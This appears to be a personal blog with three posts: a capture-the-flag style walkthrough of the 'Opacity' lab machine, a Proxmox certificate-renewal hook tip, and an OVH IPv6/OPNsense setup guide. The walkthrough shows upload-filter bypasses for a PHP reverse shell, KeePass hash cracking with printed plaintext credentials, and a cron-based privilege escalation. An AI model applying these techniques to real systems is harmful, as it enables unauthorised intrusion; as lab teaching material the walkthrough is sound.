Opacity (Easy)

Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.

Enumeration

Nmap

nmap -sC -sV -oN nmap-initial.txt $IP
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-10-22T07:50:10
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

From this we note that there is a login page, that the server is running PHP,
and that there is an SMB server running.

Let's run Gobuster to see if we can find anything else on the web server.

Gobuster

gobuster dir -w /opt/directory-list-2.3-medium.txt --url $IP
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 310] [--> http://10.10.21.236/css/]
/cloud                (Status: 301) [Size: 312] [--> http://10.10.21.236/cloud/]

The login page doesn’t reveal anything interesting, and neither does /css. smbmap also comes up empty.

The /cloud directory reveals a “5 Minute Upload” PHP application with an “External URL” field.
Some quick testing shows that it allows remote file inclusion, so a PHP reverse shell upload looks promising.

Exploit

The RFI allows uploads from the attack machine. Uploads are stored in /cloud/images/ and are displayed immediately
after upload. The page appears to filter for image extensions.

/cloud/images/php-reverse-shell.php.jpg – uploads
/cloud/images/php-reverse-shell.php – fails to upload
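
The behaviour above suggests a simple suffix whitelist. A minimal sketch of that kind of check (the actual server-side logic is an assumption) shows why the double extension passes:

```shell
# Hypothetical suffix whitelist mimicking what the uploader appears to do:
# only the final extension is inspected, so "shell.php.jpg" slips through.
check_name() {
    case "$1" in
        *.jpg|*.jpeg|*.png|*.gif) echo allowed ;;
        *)                        echo blocked ;;
    esac
}

check_name "php-reverse-shell.php.jpg"   # -> allowed
check_name "php-reverse-shell.php"       # -> blocked
```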

A null byte in the filename can be used to circumvent the extension filter.

/cloud/images/php-reverse-shell.php%00.jpg – uploads, and executing the script gives a reverse shell as www-data.

Enumeration v2

LinPEAS

LinPEAS reports the machine as vulnerable to CVE-2021-3560 (polkit), but I don’t think that’s the intended path for this machine.

Further in the output I found dataset.kdbx in /opt/, which appears to be a KeePass database. I download it to
the attack machine; John the Ripper ships with keepass2john to extract a crackable hash.

keepass2john dataset.kdbx > dataset.hash
john --wordlist=/opt/rockyou.txt dataset.hash
741852963        (dataset)

Using kpcli I can open the database.

kpcli --kdb=dataset.kdbx
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root
kpcli:/Root> ls
=== Entries ===
0. user:password                                                          
kpcli:/Root> show 0

Title: user:password
Uname: sysadmin
 Pass: Cl0udP4ss40p4city#8700
  URL: 
Notes: 

kpcli:/Root> xp 0
Copied password for "user:password" to the clipboard.
sysadmin:Cl0udP4ss40p4city#8700

local.txt

We are now able to SSH into the box as the sysadmin user.

cat local.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

PrivEsc

There is a script in the sysadmin home directory that is owned by root and runs a backup job plus some deletions. It is not in our crontab, so it is presumably in root’s, which makes it the obvious point of attack.
The script itself is not writable, but its lib directory is, and a backup.inc.php file is included from that directory.
Uploading a reverse shell and moving it into the lib directory under the name backup.inc.php replaces the file, even without write permission on the file itself, because replacing a directory entry only requires write access to the directory. Then start your listener and wait for the cron job to fire.
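
The reason this works is worth spelling out: replacing a file is a write to the directory, not to the file. A quick local demonstration (throwaway paths, not the target’s):

```shell
# A read-only file inside a writable directory can still be replaced,
# because mv/rename only needs write access to the directory.
demo=$(mktemp -d)
echo 'original include' > "$demo/backup.inc.php"
chmod 444 "$demo/backup.inc.php"            # the file itself is not writable

echo 'attacker payload' > "$demo/payload.php"
mv -f "$demo/payload.php" "$demo/backup.inc.php"   # succeeds anyway

cat "$demo/backup.inc.php"                  # -> attacker payload
```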

# cat proof.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Proxmox VE ACME/Certbot Hooks

Let’s Encrypt certificates are an easy way to help secure your Proxmox VE installation. However, sometimes you want to use them for more. In my case, I had a local service that I also wanted to use the certificate for, but when the certificate renewed the service would not restart. acme.sh has built-in hook functionality to solve exactly this need, but unfortunately it’s not easily accessed if you also want all the features of the Proxmox GUI and its certificate management, since Proxmox handles all the calls to ACME itself and doesn’t provide a hook mechanism.

Of course it would be possible to use ACME independently and then restart the needed PVE services, but I like to tinker, and I wanted to find a way to go the other way: how can I keep the PVE certificate management and still restart my local service after renewal?

After a ton of Googling, I finally managed to find a solution. Proxmox VE calls the /usr/bin/pveupdate script to update certificates. This is just a Perl script, and if you scroll down you’ll find a $renew subroutine, with the lines:

print "Restarting pveproxy after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'pveproxy']);

So I took those and added:

print "Restarting myservice after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'myservice']);

A certificate renewal via the GUI now restarts my service as well. This could be used to hook any type of action you need. The only downside is that the script needs to be patched again each time Proxmox updates it. Not the most elegant solution, but it works.
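
Since package updates silently overwrite /usr/bin/pveupdate, a small check script can flag when the hook needs re-adding. A sketch (the `myservice` name matches the hypothetical hook above; the path argument defaults to the real script and is overridable for testing):

```shell
# Warn if the custom renewal hook is missing from pveupdate, e.g. after an
# upgrade replaced the script. Pass an alternate path to test the logic.
check_hook() {
    file="${1:-/usr/bin/pveupdate}"
    if grep -q "reload-or-restart', 'myservice'" "$file"; then
        echo present
    else
        echo missing
    fi
}
```

Run it from a cron job or after every `apt upgrade` so the hook never silently disappears.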

IPv6 and *sense on OVH

UPDATE 2024-08-01: Shortly after posting, OVH moved their vRack IPv6 project to Open Beta. You can now configure a routed IPv6 /56 into the vRack. While this article still applies to servers without a vRack interface, the vRack implementation doesn’t need all the hoop-jumping to work.

IPv6 is well into deployment worldwide. According to Google, 45% of users now access their services over IPv6. It’s more appealing than ever to make sure you have a functional dual-stack network deployment.

This task is made difficult by some providers whose IPv6 configurations are less than ideal (looking at you, OVHcloud). Sure, the most basic of setups may work, but anything more complex breaks and causes headaches. But the dual-stack appeal is still there, so how do we make it work?

What is the goal?

For the purposes of this article, let’s assume we’re trying to set up a dedicated Proxmox VE server with multiple VMs. Some of these VMs need to be directly accessible from the Internet, while others can sit behind NAT. Critically, we need both IPv4 and IPv6 stacks, particularly on the public-facing services. We’re going to use OPNsense, but pfSense is similar enough that it will likely work just fine.

The problem.

The problems with OVH’s IPv6 implementation begin with the fact that they do not use prefix delegation, and they only give customers a single /64 network to work with (despite the rest of the /56 appearing unused). Instead of routing the entire block to your server and using PD, they give you a fixed gateway address that is within your /56 but outside the /64 they assign to you. As a result, configuring devices becomes much more complicated if you’re doing anything more than setting up a single public-facing server.

Additionally, their routers will not route any traffic to an IPv6 address without first receiving a Neighbour Discovery Protocol advertisement from it. For our use case, this means we need to configure *sense to forward NDP packets to the LAN, or to reply to NDP solicitations as though it held those addresses.

Initial setup.

So let’s deal with this.

The first step is getting IPv6 configured on the router. Use the web GUI to configure a static IPv6 address on the WAN interface, within the /64 network provided by OVH. Setting up a gateway poses a bit of a challenge, because OPNsense doesn’t support far IPv6 gateways (gateways outside the local subnet). To add a default gateway outside the local subnet, we first have to tell the system how to reach that gateway. To do this we create an on-link route that tells the router it will find that address on the WAN interface link, using the following command:

route -6 add xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff -interface vtnet0

Make sure to replace the address with the gateway address OVH has provided you, and the interface with the interface of your WAN interface. You can then add the gateway via the web interface, or with another command:

route -6 add default xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff

These changes will disappear as soon as you restart the router, so put them in a custom rc script so they run at boot time. Create /usr/local/etc/rc.d/ovhipv6:

#!/bin/sh

. /etc/rc.subr

name="ovhipv6"
rcvar=ovhipv6_enable
start_cmd="${name}_start"
stop_cmd="${name}_stop"

load_rc_config $name
: ${ovhipv6_enable:=no}

ovhipv6_start()
{

        route -6 add xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff -interface vtnet0
        route -6 add default xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff

}

ovhipv6_stop()
{
        route -6 delete xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff -interface vtnet0
        route -6 delete default xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff
}

run_rc_command "$1"

Then enable it by creating /etc/rc.conf.d/ovhipv6 containing:

ovhipv6_enable="YES"

You should now be able to ping -6 google.com and receive replies.

First Hiccup.

So we’ve assigned our only /64 to our WAN interface; how are we supposed to get IPv6 to our VMs behind it?

The hopeful among you might be saying “We have a router, let’s route a small subset of the /64 – say a /65 – to the LAN.” This does work, with an NDP proxy running to forward or answer the NDP requests from the OVH router. I opted for a different configuration, albeit one that still requires an NDP proxy.

Using ULAs.

My solution uses Unique Local Addresses from the fc00::/7 block of the IPv6 address space. These addresses are meant to be globally unique and are routable within private networks, but they are not intended for use on the open Internet.

To get a ULA, you start with fd followed by 40 bits of random hex. Make sure you generate your own random 40 bits. This gets you something like fd3d:a7c3:2ef1::/48. You can then add up to another 16 bits to define your “subnet”, giving fd3d:a7c3:2ef1:1234::/64.
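
One possible way to generate those 40 random bits from /dev/urandom (a sketch; any decent randomness source works):

```shell
# Build a random ULA /48 prefix: "fd" + 40 random bits, formatted as
# fdXX:XXXX:XXXX::/48
r=$(od -An -N5 -tx1 /dev/urandom | tr -d ' \n')   # 10 hex chars = 40 bits
ula="fd$(echo "$r" | cut -c1-2):$(echo "$r" | cut -c3-6):$(echo "$r" | cut -c7-10)::/48"
echo "$ula"
```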

Configure a static address within this new subnet on the LAN interface.

So now we have a /64 for the LAN side, but OVH’s routers won’t route it; so what do we do?

NPTv6

The solution we need is NPTv6. Network Prefix Translation “translates” one IPv6 prefix into another, so we can tell OPNsense to translate our fd3d:a7c3:2ef1:1234::/64 prefix to the public xxxx:xxxx:xxxx:xxxx::/64 prefix that OVH provides. As IPv6 packets enter the WAN, the external prefix is converted to our ULA one and the packet is routed to the local machine. The problem with translating the entire /64 is that our WAN interface is using one of the addresses in that space, and we don’t want it translated. The solution is to translate only a /65: half the network space stays available on the WAN interface, while anything in the other half is converted to a local address.

xxxx:xxxx:xxxx:xxxx:: - xxxx:xxxx:xxxx:xxxx:7fff:ffff:ffff:ffff will remain available on the WAN interface.

xxxx:xxxx:xxxx:xxxx:8000:: - xxxx:xxxx:xxxx:xxxx:ffff:ffff:ffff:ffff will be translated to the ULA addresses.

Under Firewall > NAT > NPTv6 you can add a new rule for the WAN interface. The external prefix will be xxxx:xxxx:xxxx:xxxx:8000::/65 and the internal prefix will be fd3d:a7c3:2ef1:1234:8000::/65.

Now assign a VM on the LAN side a static address in the upper /65 of your ULA range (anything 8000 or above in the fifth group). You can also configure DHCPv6 if you prefer, but make sure the ranges being handed out are in the upper /65 as well, otherwise they won’t be translated to the public prefix.
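
If you want to sanity-check which half of the /64 an address lands in, a small illustrative helper (purely a sketch) decides based on the fifth group:

```shell
# Decide which /65 half a given fifth group (hextet) belongs to:
# 0000-7fff stays on the WAN side, 8000-ffff is translated by NPTv6.
half_of() {
    g=$(printf '%d' "0x$1")        # hextet as a decimal integer
    if [ "$g" -ge 32768 ]; then    # 32768 = 0x8000
        echo translated
    else
        echo wan
    fi
}

half_of 7fff   # -> wan
half_of 8000   # -> translated
```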

You should now be able to ping the router and any other VMs on the LAN side with the ULAs assigned. If you packet capture on the WAN interface, you should see that packets from the LAN side are being translated correctly. But if you try to ping anything on the Internet side, no replies make it back. What gives?

NDP Proxy

Due to OVH’s absurd implementation of IPv6, the provided gateway will not route any IPv6 traffic until the sending address replies to a Neighbour Solicitation with a Neighbour Advertisement. NDP packets aren’t routable, so NPTv6 won’t translate and route them, and our router won’t reply to them because it doesn’t actually hold the address being solicited. And if we assign it that address, we break the whole setup.

The solution is ndproxy, which replies to NDP Solicitations from specified addresses, minus some exceptions. Since the addresses we’re using are routable, and all the OVH gateway needs to know is that the address is a neighbour, this works well. The problem is that ndproxy isn’t supported by *sense, so we have to compile it ourselves.

Compiling and configuring

Make sure you have git installed, and clone the OPNsense source as well as the upstream FreeBSD ports.

pkg install git
git clone --recurse-submodules https://github.com/opnsense/src /usr/src
git clone --recurse-submodules https://git.FreeBSD.org/ports.git /usr/ports-upstream

Move into the ndproxy directory and make and install the kernel module.

cd /usr/ports-upstream/net/ndproxy
make clean
make install

This process will have to be completed every time there is a kernel update.

ndproxy is configured with sysctl values, and these are applied automatically at startup. To configure it, we include the values we want in /etc/rc.conf.d/ndproxy:

# Start at boot
ndproxy_enable="YES"
# The WAN interface that will be listening for NDP Solicitations
ndproxy_uplink_interface="vtnet0"
# The MAC address of the WAN interface that will be used to fill the NDP Advertisements
ndproxy_downlink_mac_address="XX:XX:XX:XX:XX:XX"
# Addresses NOT to reply to.  Include the addresses (including link-local) of the router and any other
# system that is on the WAN side and needs to respond to its own NDP packets. (Separate with semicolons)
ndproxy_exception_ipv6_addresses="xxxx:xxxx:xxxx:xxxx:yyyy:yyyy:yyyy:yyyy;fe80::xxxx:xxxx:xxxx:xxxx"
# Only NDP packets sent from the addresses listed below will be handled by ndproxy; anything else is ignored.
# Put all addresses that the provider sends NDP packets from in this list. (Separate with semicolons)
ndproxy_uplink_ipv6_addresses="xxxx:xxxx:xxxx:xxff:ff:ff:ff:ff;xxxx:xxxx:xxxx:xxff:ff:ff:ff:fe;xxxx:xxxx:xxxx:xxff:ff:ff:ff:fd"

Start ndproxy and test.

You should now be ready to test. Start ndproxy via /usr/local/etc/rc.d/ndproxy start, then send a ping from one of the LAN machines; you should get replies within a few seconds. If you packet capture on the WAN interface again, you will see the NDP solicitations and advertisements going to and from the gateway as ndproxy replies to them.